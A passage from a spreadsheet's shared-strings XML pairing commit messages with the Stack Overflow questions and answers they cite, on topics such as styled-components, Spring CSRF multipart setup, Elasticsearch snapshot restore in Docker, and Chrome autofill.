}
.draw:hover {
  background-position: 0 100%, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 0%;
  animation: animate 1.4s linear infinite 0.2s;
}
@keyframes animate {
  0% {
  background-position: 0 100%, 0 0, 0 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 0%;
  }
  40% {
  background-position: 0 100%, 100% 0, 100% 100%, 100% 0;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 100%;
  }
  60% {
  background-position: 0 100%, 100% 0, 100% 100%, 100% 100%;
  background-size: 3px 0%, 0% 3px, 100% 3px,3px 100%
  }
  70% {
  background-position: 0 100%, 100% 0, 0% 100%, 100% 100%;
  background-size: 3px 100%, 0% 3px, 100% 3px,3px 0%;
  }
  80% {
  background-position: 0% 0%, 0% 0, 0% 100%, 100% 100%;
  background-size: 3px 100%, 0% 3px, 0% 3px,3px 0%;
  }
  100% {
  background-position: 0% 0%, 0 0, 0 100%, 100% 100%;
  background-size: 3px 0%, 100% 3px, 0% 3px,3px 0%  
  }
}
&lt;button class="draw"&gt;Draw&lt;/button&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to develop a multi-server clustered framework that will work similarly to the steps below for message flow.
From Client
Gateway Server Recieves Message
Gateway Server sends an ACK Message (UDP)
Message is custom deserialized from binary into an object via a factory
Message is then routed to a secondary server in the cluster (config based) and sends the object to the secondary server via WCF
Message is handled on the secondary server.
From Server
Secondary Server builds a Message and sends to the gateway server
Gateway server binary serializes the Message
Gateway server sends the binary to the client and waits for an ACK message (UDP)
The servers will be configured via .config files for pointing to the services, either locally in the same application (the WCF will be initialized) or other systems.
Has anyone worked to create any type of architecture like this, and if so, what are some of the issues you have run into?
EDIT
The system is going to be the server side to an already pre-existing protocol, so any of the client to server protocol is essentially untouchable, but it does include state management (client sends session with every call), encryption, server routing, and packet protection.
Edit
Can someone even provide a link to an open source project that uses clustering in .Net?
</t>
  </si>
  <si>
    <t>C407</t>
  </si>
  <si>
    <t>Some warnings removed (styled components transient props)
https://stackoverflow.com/questions/57586654/styled-component-attrs-react-does-not-recognize-prop</t>
  </si>
  <si>
    <t>Update: Use transient props
With the release 5.1.0 you can use transient props. This way you do not need an extra wrapper i.e. unnecessary code is reduced:
Transient props are a new pattern to pass props that are explicitly consumed only by styled components and are not meant to be passed down to deeper component layers. Here's how you use them:
const Comp = styled.div`
  color: ${props =&gt; props.$fg || 'black'};
`;
render(&lt;Comp $fg="red"&gt;I'm red!&lt;/Comp&gt;);
Note the dollar sign ($) prefix on the prop; this marks it as transient and styled-components knows not to add it to the rendered DOM element or pass it further down the component hierarchy.
The new answer should be:
Component:
&lt;ImageWithText 
  $imageData={data.headerBackgroundImage.childImageSharp.fluid} // notice the '$'
  $minHeight='50vh'&gt;
Declaration of styled component:
const StyledBackgroundImage = styled(BackgroundImage).attrs(({$minHeight}) =&gt; ({
  minHeight: minHeight || "60vh",
}))`
  min-height: ${({$minHeight}) =&gt; $minHeight}; // notice the '$' before the prop name
  /* ...  */
`;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm extracting content from a SourceOne EMX file, and I'm able to handle MSG and EML data just fine. The file type I'm not familiar with how to parse is OTG (which may also be referred to as ONM files?). These are very old proprietary IBM formats used with Lotus Notes.&lt;/p&gt;
&lt;p&gt;I was able to parse out the header information, however I'm stuck on how to decode message bodies. So far, the IBM437 encoding got me the closest, but is far from being fully readable. Here is a snipped of what it looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;??Z          ?  ?                                               ??? ? $'d       ? ??L   
I'll be sure to give your name as the point of contact on this one. ???Z          ?  ?                                               ??                  ? ?  ????@     ----- Forwarded by &amp;lt;redacted&amp;gt;? ? ? ?  ???  ????      on 10/06/2020 12:24 PM ? ? ? ?  ???  ????       -----? ? ? ?  ?????Z          ?  ?                                               ??                  ? ??   
???Z          @  ?                                               ??@
     ,d       ? ?  ????  ?  From:   ? ___ ?  ????/      &amp;quot;&amp;lt;redacted&amp;gt;&amp;quot; &amp;lt;redacted@redacted.com&amp;gt; ???Z          @  ?  H                                           ??@
     ,d       ? ?  ????  ?  To: ? ___ ?  ????+      &amp;quot;&amp;lt;redacted&amp;gt;&amp;quot; &amp;lt;redacted@redacted.com&amp;gt; ?? ?  ????  ?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please send help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C408</t>
  </si>
  <si>
    <t>Wrap initial setExternalState() call in useEffect
This eliminates a basic error in using functional components:
https://stackoverflow.com/a/65911215/1886928</t>
  </si>
  <si>
    <t>I fixed this issue by removing the dispatch from the register components render method to the componentwillunmount method. This is because I wanted this logic to occur right before redirecting to the login page. In general it's best practice to put all your logic outside the render method so my code was just poorly written before. Hope this helps anyone else in future :)
My refactored register component:
class Register extends Component {
  componentWillUnmount() {
    // Reset register status to allow return to register page
    if ( this.props.registerStatus !== "" ) this.props.dispatch( resetRegisterStatus() )
  }
  render() {
    if( this.props.registerStatus === SUCCESS ) { 
      return &lt;Redirect push to = {LOGIN}/&gt;
    }
    return (
      &lt;div style = {{paddingTop: "180px", background: 'radial-gradient(circle, rgba(106,103,103,1) 0%, rgba(36,36,36,1) 100%)', height: "100vh"}}&gt;
        &lt;RegistrationForm/&gt;
      &lt;/div&gt;
    );
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">The short form of this question: When, if ever, is it appropriate to use the Forms.Timer in a multithreaded WinForms application?
More specifically, I am architecting an application that uses multiple System.Threading.Timers to launch processes asynchronously, check queues containing the results of those asynchronous processes, and update the statistics to be shown by the application's main form.
In an application like that, is it appropriate to use a Forms.Timer to actually check the application statistics and draw them to the main form or would that just throw a wrench into the application's smooth running?
</t>
  </si>
  <si>
    <t>C409</t>
  </si>
  <si>
    <t>"Declarative API for Initial Components": Incorporate event names that contain upper-case characters (#87)
Update Declarative_API_for_Initial_Components_82a0fce.md
Incorporate event names that contain upper-case characters. 
Sample use: get notified when the component gets created by assigning a global handler to the `ComponentContainer`'s `componentCreated` event in the HTML document.
Related Q&amp;A: https://stackoverflow.com/q/76587625/5846045</t>
  </si>
  <si>
    <t>Without touching the Component.js content, if you can control both the initial HTML document (here: index.html) and the JS file assigned to data-sap-ui-oninit (here: myBootstrap.js) you can attach a handler to the ComponentContainer's events such as componentCreated or componentFailed like this:
In index.html:
In myBootstrap.js:
// ...
globalThis.onMyComponentCreated = function(event) {
  const myCreatedComponent = event.getParameter("component");
  // ...
};
// === With UI5 1.x ===
sap.ui.require(["sap/ui/core/ComponentSupport"]); // will register onMyComponentCreated only in UI5 1.x
// ====================
// === With UI5 2.x ===
sap.ui.require([
  "sap/ui/core/ComponentContainer", // has to be created manually for this case only in UI5 2.x
], ComponentContainer =&gt; new ComponentContainer({
  id: "myRootComponentContainer",
  name: "my.demo",
  componentCreated: globalThis.onMyComponentCreated, // or an anonymous function
  height: "100%",
  settings: { id: "myRootComponent" },
  // Settings that sap/ui/core/ComponentSupport applies by default:
  lifecycle: "Container", // enum sap.ui.core.ComponentLifecycle
  autoPrefixId: true,
  manifest: true,
}).placeAt("content"));
// =======================
Here, the handler name "onMyComponentCreated" is just a sample name. Make sure to create a name that would not cause a name collision in the global scope, or assign an anonymous function when creating a ComponentContainer manually.
Regarding the data-component-created syntax:
As HTML is case-insensitive, in order to define a property with upper-case characters, you have to "escape" them with a dash character. (From the API reference: sap/ui/core/ComponentSupport)
For more information, review the documentation topic "Declarative API for Initial Components".</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm testing it on Android 13, the FAB button doesn't get pushed up when the Keyboard appears, I tried everything, am I doing something wrong?&lt;/p&gt;
&lt;p&gt;I'm using Ionic 7 + Vue&lt;/p&gt;
&lt;p&gt;My actual code is more complex, but I tried a bare minimum example and it still doesn't work either.&lt;/p&gt;
&lt;p&gt;Is there anything I need to do to it work properly?&lt;/p&gt;
&lt;p&gt;This is the code:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;&amp;lt;script setup lang=&amp;quot;ts&amp;quot;&amp;gt;
import { IonContent, IonFab, IonFabButton, IonHeader, IonInput, IonPage } from '@ionic/vue'
&amp;lt;/script&amp;gt;
&amp;lt;template&amp;gt;
  &amp;lt;IonPage&amp;gt;
    &amp;lt;IonHeader&amp;gt; Test &amp;lt;/IonHeader&amp;gt;
    &amp;lt;IonContent&amp;gt;
      &amp;lt;IonInput label=&amp;quot;Test&amp;quot; /&amp;gt;
    &amp;lt;/IonContent&amp;gt;
    &amp;lt;IonFab
      slot=&amp;quot;fixed&amp;quot;
      vertical=&amp;quot;bottom&amp;quot;
      horizontal=&amp;quot;end&amp;quot;
    &amp;gt;
      &amp;lt;IonFabButton&amp;gt;Test&amp;lt;/IonFabButton&amp;gt;
    &amp;lt;/IonFab&amp;gt;
  &amp;lt;/IonPage&amp;gt;
&amp;lt;/template&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;main.ts:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { createApp } from 'vue'
import App from './App.vue'
import './plugins'
import router from './router'
import { IonicVue } from '@ionic/vue'
/* Core CSS required for Ionic components to work properly */
import '@ionic/vue/css/core.css'
/* Basic CSS for apps built with Ionic */
import '@ionic/vue/css/normalize.css'
import '@ionic/vue/css/structure.css'
import '@ionic/vue/css/typography.css'
/* Optional CSS utils that can be commented out */
import '@ionic/vue/css/display.css'
import '@ionic/vue/css/flex-utils.css'
import '@ionic/vue/css/float-elements.css'
import '@ionic/vue/css/padding.css'
import '@ionic/vue/css/text-alignment.css'
import '@ionic/vue/css/text-transformation.css'
/**
 * Ionic Dark Mode
 * -----------------------------------------------------
 * For more info, please see:
 * https://ionicframework.com/docs/theming/dark-mode
 */
/* @import '@ionic/vue/css/palettes/dark.always.css'; */
/* @import '@ionic/vue/css/palettes/dark.class.css'; */
// import '@ionic/vue/css/palettes/dark.system.css'
/* Theme variables */
import './theme/variables.css'
const app = createApp(App).use(IonicVue).use(router)
router.isReady().then(() =&amp;gt; {
  app.mount('#app')
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;plugins.ts:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { StatusBar } from '@capacitor/status-bar'
StatusBar.setOverlaysWebView({ overlay: true })
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Package.json:&lt;/p&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;{
  &amp;quot;name&amp;quot;: &amp;quot;test&amp;quot;,
  &amp;quot;private&amp;quot;: true,
  &amp;quot;version&amp;quot;: &amp;quot;0.0.1&amp;quot;,
  &amp;quot;type&amp;quot;: &amp;quot;module&amp;quot;,
  &amp;quot;scripts&amp;quot;: {
    &amp;quot;dev&amp;quot;: &amp;quot;vite&amp;quot;,
    &amp;quot;build&amp;quot;: &amp;quot;vue-tsc &amp;amp;&amp;amp; vite build&amp;quot;,
    &amp;quot;preview&amp;quot;: &amp;quot;vite preview&amp;quot;,
    &amp;quot;test:e2e&amp;quot;: &amp;quot;cypress run&amp;quot;,
    &amp;quot;test:unit&amp;quot;: &amp;quot;vitest&amp;quot;,
    &amp;quot;lint&amp;quot;: &amp;quot;eslint .&amp;quot;,
    &amp;quot;lint:fix&amp;quot;: &amp;quot;eslint . --fix&amp;quot;
  },
  &amp;quot;dependencies&amp;quot;: {
    &amp;quot;@capacitor/android&amp;quot;: &amp;quot;7.0.1&amp;quot;,
    &amp;quot;@capacitor/app&amp;quot;: &amp;quot;7.0.0&amp;quot;,
    &amp;quot;@capacitor/core&amp;quot;: &amp;quot;7.0.1&amp;quot;,
    &amp;quot;@capacitor/haptics&amp;quot;: &amp;quot;7.0.0&amp;quot;,
    &amp;quot;@capacitor/keyboard&amp;quot;: &amp;quot;7.0.0&amp;quot;,
    &amp;quot;@capacitor/status-bar&amp;quot;: &amp;quot;7.0.0&amp;quot;,
    &amp;quot;@ionic/vue&amp;quot;: &amp;quot;^8.0.0&amp;quot;,
    &amp;quot;@ionic/vue-router&amp;quot;: &amp;quot;^8.0.0&amp;quot;,
    &amp;quot;ionicons&amp;quot;: &amp;quot;^7.0.0&amp;quot;,
    &amp;quot;vue&amp;quot;: &amp;quot;^3.3.0&amp;quot;,
    &amp;quot;vue-router&amp;quot;: &amp;quot;^4.2.0&amp;quot;
  },
  &amp;quot;devDependencies&amp;quot;: {
    &amp;quot;@capacitor/cli&amp;quot;: &amp;quot;7.0.1&amp;quot;,
    &amp;quot;@vitejs/plugin-legacy&amp;quot;: &amp;quot;^5.0.0&amp;quot;,
    &amp;quot;@vitejs/plugin-vue&amp;quot;: &amp;quot;^4.0.0&amp;quot;,
    &amp;quot;@vue/eslint-config-typescript&amp;quot;: &amp;quot;^12.0.0&amp;quot;,
    &amp;quot;@vue/test-utils&amp;quot;: &amp;quot;^2.3.0&amp;quot;,
    &amp;quot;cypress&amp;quot;: &amp;quot;^13.5.0&amp;quot;,
    &amp;quot;eslint&amp;quot;: &amp;quot;^8.35.0&amp;quot;,
    &amp;quot;eslint-config-prettier&amp;quot;: &amp;quot;^10.0.1&amp;quot;,
    &amp;quot;eslint-plugin-prettier&amp;quot;: &amp;quot;^5.2.3&amp;quot;,
    &amp;quot;eslint-plugin-vue&amp;quot;: &amp;quot;^9.9.0&amp;quot;,
    &amp;quot;jsdom&amp;quot;: &amp;quot;^22.1.0&amp;quot;,
    &amp;quot;prettier&amp;quot;: &amp;quot;^3.5.1&amp;quot;,
    &amp;quot;prettier-plugin-organize-imports&amp;quot;: &amp;quot;^4.1.0&amp;quot;,
    &amp;quot;terser&amp;quot;: &amp;quot;^5.4.0&amp;quot;,
    &amp;quot;typescript&amp;quot;: &amp;quot;~5.6.2&amp;quot;,
    &amp;quot;vite&amp;quot;: &amp;quot;~5.2.0&amp;quot;,
    &amp;quot;vitest&amp;quot;: &amp;quot;^0.34.6&amp;quot;,
    &amp;quot;vue-tsc&amp;quot;: &amp;quot;^2.1.10&amp;quot;
  },
  &amp;quot;description&amp;quot;: &amp;quot;An Ionic project&amp;quot;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C41</t>
  </si>
  <si>
    <t>Enable CSRF protection
Cross Site Request Forgery "is a type of malicious exploit of a website
where unauthorized commands are transmitted from a user that the web
application trusts"[1].
Spring Security can protect against CSRF attacks[2][3] by including a
token on each page that must be submitted with a POST request, either as
a parameter or as a header.- Helping Spring Security find and parse CSRF tokens in multipart forms
In order for Spring Security to extract the CSRF from
such POST requests, the `CommonsMultipartResolver` must be named
`filterMultipartResolver`[5]
[5] https://stackoverflow.com/a/21448087/25637</t>
  </si>
  <si>
    <t>I was able to resolve this with help from the Spring Security team.  I have updated the Gist to reflect a working configuration.  I had to follow the steps given below in order to get everything to work as expected.
1. Common Step
Add a MultipartFilter to web.xml as described in the answer by @holmis83, ensuring that it is added before the Spring Security configuration:
&lt;filter&gt;
    &lt;display-name&gt;springMultipartFilter&lt;/display-name&gt;
    &lt;filter-name&gt;springMultipartFilter&lt;/filter-name&gt;
    &lt;filter-class&gt;org.springframework.web.multipart.support.MultipartFilter&lt;/filter-class&gt;
&lt;/filter&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;springMultipartFilter&lt;/filter-name&gt;
    &lt;url-pattern&gt;/*&lt;/url-pattern&gt;
&lt;/filter-mapping&gt;
&lt;filter&gt;
    &lt;display-name&gt;springSecurityFilterChain&lt;/display-name&gt;
    &lt;filter-name&gt;springSecurityFilterChain&lt;/filter-name&gt;
    &lt;filter-class&gt;org.springframework.web.filter.DelegatingFilterProxy&lt;/filter-class&gt;
&lt;/filter&gt;
&lt;filter-mapping&gt;
    &lt;filter-name&gt;springSecurityFilterChain&lt;/filter-name&gt;
    &lt;url-pattern&gt;/*&lt;/url-pattern&gt;
    &lt;dispatcher&gt;ERROR&lt;/dispatcher&gt;
    &lt;dispatcher&gt;FORWARD&lt;/dispatcher&gt;
    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;
&lt;/filter-mapping&gt;
2.1. Using Apache Commons Multipart Resolver
Ensure that there is an Apache Commons Multipart Resolver bean named filterMultipartResolver in the root Spring application context.  I will stress this again, make sure that the Multipart Resolver is declared in the root Spring Context (usually called applicationContext.xml).  For example,
web.xml
&lt;context-param&gt;
    &lt;param-name&gt;contextConfigLocation&lt;/param-name&gt;
    &lt;param-value&gt;
        classpath*:springWebMultipartContext.xml
    &lt;/param-value&gt;
&lt;/context-param&gt;
springWebMultipartContext.xml
&lt;beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"&gt;
    &lt;bean id="filterMultipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipartResolver"&gt;
        &lt;property name="maxUploadSize" value="100000000" /&gt;
    &lt;/bean&gt;
&lt;/beans&gt;
Make sure that the bean is called filterMultipartResolver as any other bean name is not picked up by MultipartFilter configured in web.xml.  My initial configuration was not working because this bean was named multipartResolver.  I even tried passing the bean name to MultipartFilter using web.xml init-param but that did not work either.
2.2. Using Tomcat Multipart support
Tomcat 7.0+ has in-built multipart support, but it has to be explicitly enabled.  Either change the global Tomcat context.xml file as follows or include a local context.xml file in your WAR file for this support to work without making any other changes to your application.
&lt;Context allowCasualMultipartParsing="true"&gt;
    ...
&lt;/Context&gt;
After these changes using Apache Commons Multipart Resolver our application is working so far on Tomcat, Jetty and Weblogic.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems pcolormesh have a different way of handling colorbar tick position and label than other Python tools. I can't get my labels at the desired position : centered by color segment (see image: &lt;a href="https://i.sstatic.net/MBl24jSp.png" rel="nofollow noreferrer"&gt;current rendering&lt;/a&gt; where the ticks are misaligned).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Add a colorbar with commune names
cbar = plt.colorbar(mesh, ax=ax, ticks=np.arange(1, len(commune_names) + 1))
# Set the tick labels to the commune names
cbar.set_ticklabels(commune_names)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tested many things, also using AI, but couldn't figure it out.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
# Add a colorbar with commune names
cbar = plt.colorbar(mesh, ax=ax)
# Set up tick labels and positions
k = len(commune_names)
labels = np.arange(1, k + 1)  # Commune IDs, from 1 to k
loc = labels - 0.5  # Shift ticks by 0.5 to center them in the color segments
# Set the ticks and labels
cbar.set_ticks(loc)
cbar.set_ticklabels(commune_names)
# Adjust the tick size (optional)
cbar.ax.tick_params(labelsize=10)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for your help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C410</t>
  </si>
  <si>
    <t>refactor: vee-validate component way
https://stackoverflow.com/questions/66656452</t>
  </si>
  <si>
    <t xml:space="preserve">I used to work for a company where some of the lead architect/developers had mandated on various projects that assertions were not to be used, and they would routinely be removed from code and replaced with exceptions.  
I feel they are extremely important in writing correct code.  Can anyone suggest how such a mandate could be justified?  If so, what's wrong with assertions?
</t>
  </si>
  <si>
    <t>This can be solved by listening on the input/change events and passing data between &lt;Field&gt; and (in this special case Primevue's) &lt;Dropdown&gt; as follows:
&lt;Form v-slot="{ errors }" @submit="saveAndProceed()"&gt;
...
  &lt;Field
    v-slot="{ field }"
    v-model="campaign"
    name="campaign"
    value="value"
    :rules="isRequired"
  &gt;
    &lt;Dropdown
      :options="campaigns"
      option-value="id"
      option-label="name"
      placeholder="Choose a campaign"
      :model-value="field.value"
      :class="{ 'p-invalid': errors.campaign }"
      @input="field.onInput.forEach((fn) =&gt; fn($event.value))"
      @change="field.onChange.forEach((fn) =&gt; fn($event.value))"
    /&gt;
    &lt;ErrorMessage
      name="campaign"
      class="error"
    /&gt;
  &lt;/Field&gt;
...
&lt;/Form&gt;
Compare also with the following references for other events (onBlur etc.):
Vee-validate's Field reference
E.g., Primevue's Dropdown events</t>
  </si>
  <si>
    <t>C411</t>
  </si>
  <si>
    <t>refactor: remove react fragments as they may be causing hydration errors
See https://stackoverflow.com/questions/72662294/can-i-pass-data-fetched-in-getstaticprops-to-a-component/72665172#72665172.</t>
  </si>
  <si>
    <t>This error might be happening due to not wrapping the data you are passing to Header properly in a JSX element. Try using a JSX element inside of Header like a div or ul if it's a list for example.
Also, avoid some JSX wrapping patterns such as, for example, a p tag wrapping up a div, section, etc. Next.js will most likely throw a similar error because of this.
Reference thread</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a elasticsearch using docker. So far everything is working fine, but I want to restore de data from another elastic I have in another computer. I've created the repository, repo.path is defined in the variables and the folder is created when the repository is. I've copied the files I've obtained through the API in the folder of the repository but the API doesn't recognize them.&lt;/p&gt;
&lt;p&gt;This is my docker-compose:&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;volumes:
 certs:
   driver: local
 esdata01:
   driver: local
 kibanadata:
   driver: local
 metricbeatdata01:
   driver: local
 filebeatdata01:
   driver: local
 logstashdata01:
   driver: local
networks:
 default:
   name: elastic
   external: false
services:
 setup:
   image: docker.elastic.co/elasticsearch/elasticsearch:${STACK_VERSION}
   volumes:
     - certs:/usr/share/elasticsearch/config/certs
   user: &amp;quot;0&amp;quot;
   command: &amp;gt;
     bash -c '
       if [ x${ELASTIC_PASSWORD} == x ]; then
         echo &amp;quot;Set the ELASTIC_PASSWORD environment variable in the .env file&amp;quot;;
         exit 1;
       elif [ x${KIBANA_PASSWORD} == x ]; then
         echo &amp;quot;Set the KIBANA_PASSWORD environment variable in the .env file&amp;quot;;
         exit 1;
       fi;
       if [ ! -f config/certs/ca.zip ]; then
         echo &amp;quot;Creating CA&amp;quot;;
         bin/elasticsearch-certutil ca --silent --pem -out config/certs/ca.zip;
         unzip config/certs/ca.zip -d config/certs;
       fi;
       if [ ! -f config/certs/certs.zip ]; then
         echo &amp;quot;Creating certs&amp;quot;;
         echo -ne \
         &amp;quot;instances:\n&amp;quot;\
         &amp;quot;  - name: es01\n&amp;quot;\
         &amp;quot;    dns:\n&amp;quot;\
         &amp;quot;      - es01\n&amp;quot;\
         &amp;quot;      - localhost\n&amp;quot;\
         &amp;quot;    ip:\n&amp;quot;\
         &amp;quot;      - 127.0.0.1\n&amp;quot;\
         &amp;quot;  - name: kibana\n&amp;quot;\
         &amp;quot;    dns:\n&amp;quot;\
         &amp;quot;      - kibana\n&amp;quot;\
         &amp;quot;      - localhost\n&amp;quot;\
         &amp;quot;    ip:\n&amp;quot;\
         &amp;quot;      - 127.0.0.1\n&amp;quot;\
         &amp;gt; config/certs/instances.yml;
         bin/elasticsearch-certutil cert --silent --pem -out config/certs/certs.zip --in config/certs/instances.yml --ca-cert config/certs/ca/ca.crt --ca-key config/certs/ca/ca.key;
         unzip config/certs/certs.zip -d config/certs;
       fi;
       echo &amp;quot;Setting file permissions&amp;quot;
       chown -R root:root config/certs;
       find . -type d -exec chmod 750 \{\} \;;
       find . -type f -exec chmod 640 \{\} \;;
       echo &amp;quot;Waiting for Elasticsearch availability&amp;quot;;
       until curl -s --cacert config/certs/ca/ca.crt https://es01:9200 | grep -q &amp;quot;missing authentication credentials&amp;quot;; do sleep 30; done;
       echo &amp;quot;Setting kibana_system password&amp;quot;;
       until curl -s -X POST --cacert config/certs/ca/ca.crt -u &amp;quot;elastic:${ELASTIC_PASSWORD}&amp;quot; -H &amp;quot;Content-Type: application/json&amp;quot; https://es01:9200/_security/user/kibana_system/_password -d &amp;quot;{\&amp;quot;password\&amp;quot;:\&amp;quot;${KIBANA_PASSWORD}\&amp;quot;}&amp;quot; | grep -q &amp;quot;^{}&amp;quot;; do sleep 10; done;
       echo &amp;quot;All done!&amp;quot;;
     '
   healthcheck:
     test: [&amp;quot;CMD-SHELL&amp;quot;, &amp;quot;[ -f config/certs/es01/es01.crt ]&amp;quot;]
     interval: 1s
     timeout: 5s
     retries: 120
 es01:
   depends_on:
     setup:
       condition: service_healthy
   image: docker.elastic.co/elasticsearch/elasticsearch:${STACK_VERSION}
   labels:
     co.elastic.logs/module: elasticsearch
   volumes:
     - certs:/usr/share/elasticsearch/config/certs
     - esdata01:/usr/share/elasticsearch/data
     - ./snapshots:/usr/share/elasticsearch/snapshots
   ports:
     - ${ES_PORT}:9200
   environment:
     - node.name=es01
     - cluster.name=${CLUSTER_NAME}
     - discovery.type=single-node
     - ELASTIC_PASSWORD=${ELASTIC_PASSWORD}
     - bootstrap.memory_lock=true
     - xpack.security.enabled=true
     - xpack.security.http.ssl.enabled=true
     - xpack.security.http.ssl.key=certs/es01/es01.key
     - xpack.security.http.ssl.certificate=certs/es01/es01.crt
     - xpack.security.http.ssl.certificate_authorities=certs/ca/ca.crt
     - xpack.security.transport.ssl.enabled=true
     - xpack.security.transport.ssl.key=certs/es01/es01.key
     - xpack.security.transport.ssl.certificate=certs/es01/es01.crt
     - xpack.security.transport.ssl.certificate_authorities=certs/ca/ca.crt
     - xpack.security.transport.ssl.verification_mode=certificate
     - xpack.license.self_generated.type=${LICENSE}
     - path.repo=/usr/share/elasticsearch/snapshots
     - xpack.graph.enabled=true
   mem_limit: ${ES_MEM_LIMIT}
   ulimits:
     memlock:
       soft: -1
       hard: -1
   healthcheck:
     test:
       [
         &amp;quot;CMD-SHELL&amp;quot;,
         &amp;quot;curl -s --cacert config/certs/ca/ca.crt https://localhost:9200 | grep -q 'missing authentication credentials'&amp;quot;,
       ]
     interval: 10s
     timeout: 10s
     retries: 120
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is made following the official docs&lt;/p&gt;
&lt;p&gt;Then, using postman I do a PUT&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;https://localhost:9200/_snapshot/snap
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with this body:&lt;/p&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;{
  &amp;quot;type&amp;quot;: &amp;quot;fs&amp;quot;,
  &amp;quot;settings&amp;quot;: {
    &amp;quot;location&amp;quot;: &amp;quot;/usr/share/elasticsearch/snapshots/snap&amp;quot;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After that, I copy the files in the folder &lt;code&gt;snap&lt;/code&gt; which looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;19/02/2025  21:07    &amp;lt;DIR&amp;gt;          .
19/02/2025  19:58    &amp;lt;DIR&amp;gt;          ..
19/02/2025  20:39            13.133 index-0
19/02/2025  20:39                 8 index.latest
19/02/2025  20:39    &amp;lt;DIR&amp;gt;          indices
19/02/2025  20:39             1.208 meta-4rweKduLS3e1knI8y8Z7Pw.dat
19/02/2025  20:39             1.267 snap-4rweKduLS3e1knI8y8Z7Pw.dat
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then again in postman I do a GET to &lt;code&gt;https://localhost:9200/_snapshot/snap/_all&lt;/code&gt; and the answer is:&lt;/p&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;{
    &amp;quot;snapshots&amp;quot;: [],
    &amp;quot;total&amp;quot;: 0,
    &amp;quot;remaining&amp;quot;: 0
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've also given permission to the folder for everything with &lt;code&gt;chmod -R 777 /usr/share/elasticsearch/snapshots&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The host is Windows and through docker exec I can see the files in the folder &lt;code&gt;/usr/share/elasticsearch/snapshots&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Any ideas with what is wrong or how can I workaround to restore de data?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C412</t>
  </si>
  <si>
    <t>update component to ignore chrome autofill
my testing confirms this stack overflow answer that chrome no longer respects "off" to disable autofill https://stackoverflow.com/a/55292734</t>
  </si>
  <si>
    <t xml:space="preserve">autocomplete="off" doesn't work anymore. The only thing which works as of 2019 is autocomplete="new-password"
Check this link on Chromium Project https://www.chromium.org/developers/design-documents/form-styles-that-chromium-understands
Add an autocomplete attribute with a value of username for usernames.
If you've implemented an "email first" sign-in flow that separates the
username and password into two separate forms, include a form field containing the username in the form used to collect the password. You can, of course, hide this field via CSS if that's appropriate for your layout.
Add an autocomplete attribute with a value of current-password
for the password field on a sign-in form.
Add an autocomplete
attribute with a value of new-password for the password field on sign-up and change-password forms.
If you require the user to type
their password twice during sign-up or password update, add the new-password autocomplete attribute on both fields.
&lt;form id="login" action="signup.php" method="post"&gt;
  &lt;input type="text" autocomplete="new-password"&gt;
  &lt;input type="password" autocomplete="new-password"&gt;
  &lt;input type="submit" value="Sign Up"&gt;
&lt;/form&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a webapp with different Dynamic Web Projects, each of them generally containing an EJB Project. We want to keep them interacting, as in using beans and classes from each other's EJBs through JNDI, sharing the same database or using their own. But we also want to be able to keep different projects on different servers.
What would be the right focus for this kind of project in terms of architecture and organization?
How should we use EARs? One EAR to rule them all and in the darkness bind them? (sorry, had to do that LOTR reference), or an EAR per server/web project, etc.?
</t>
  </si>
  <si>
    <t>C413</t>
  </si>
  <si>
    <t>Add Blade component renderer
Inspired by https://stackoverflow.com/a/69732872/4149783</t>
  </si>
  <si>
    <t>I use this, it also works with anonymous component. Put this in your helper file.
/**
 * Render a blade component.
 * @param string $name Component name, exclude component folder (i.e use "card" instead of "components.card")
 * @param array $props Component properties
 * @param array $attributes Component attributes
 * @return \Illuminate\Contracts\View\View
 */
function viewComponent($name, $props = [], $attributes = []) {
